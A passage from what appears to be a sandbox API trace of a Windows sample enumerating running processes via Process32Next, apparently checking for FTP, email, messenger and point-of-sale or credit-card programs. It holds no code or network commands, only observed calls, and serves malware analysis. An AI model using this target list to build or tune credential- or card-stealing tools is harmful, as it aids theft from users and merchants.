[0246.457] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0246.459] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0246.462] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0246.464] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0246.467] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0246.469] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0246.471] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0246.474] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0246.477] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0246.483] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0246.486] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0246.490] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0246.492] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0246.495] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0246.497] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0246.500] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0246.503] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0246.506] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0246.509] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0246.512] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0246.515] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0246.518] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0246.523] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0246.526] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0246.529] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0246.533] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0246.537] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0246.540] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0246.542] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0246.545] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0246.548] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0246.551] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0246.553] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0246.556] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0246.564] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0246.567] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0246.570] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0246.574] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0246.576] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0246.578] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0246.580] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0246.582] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0246.584] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0246.587] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0246.590] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0246.593] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0246.595] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0246.597] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0246.609] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0246.612] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0246.615] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0246.618] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0246.621] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0246.623] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0246.625] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0246.628] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0246.631] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.633] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0246.637] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.640] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.644] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0246.653] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.655] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.658] CloseHandle (hObject=0x2318) returned 1 [0246.658] Sleep (dwMilliseconds=0x64) [0246.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22f4 [0246.811] Process32First (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.814] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.815] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.818] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.821] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.824] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.826] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.828] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.831] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.873] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.876] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.878] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.881] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.884] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.886] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.888] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.890] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.893] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.896] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.898] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.900] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.902] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 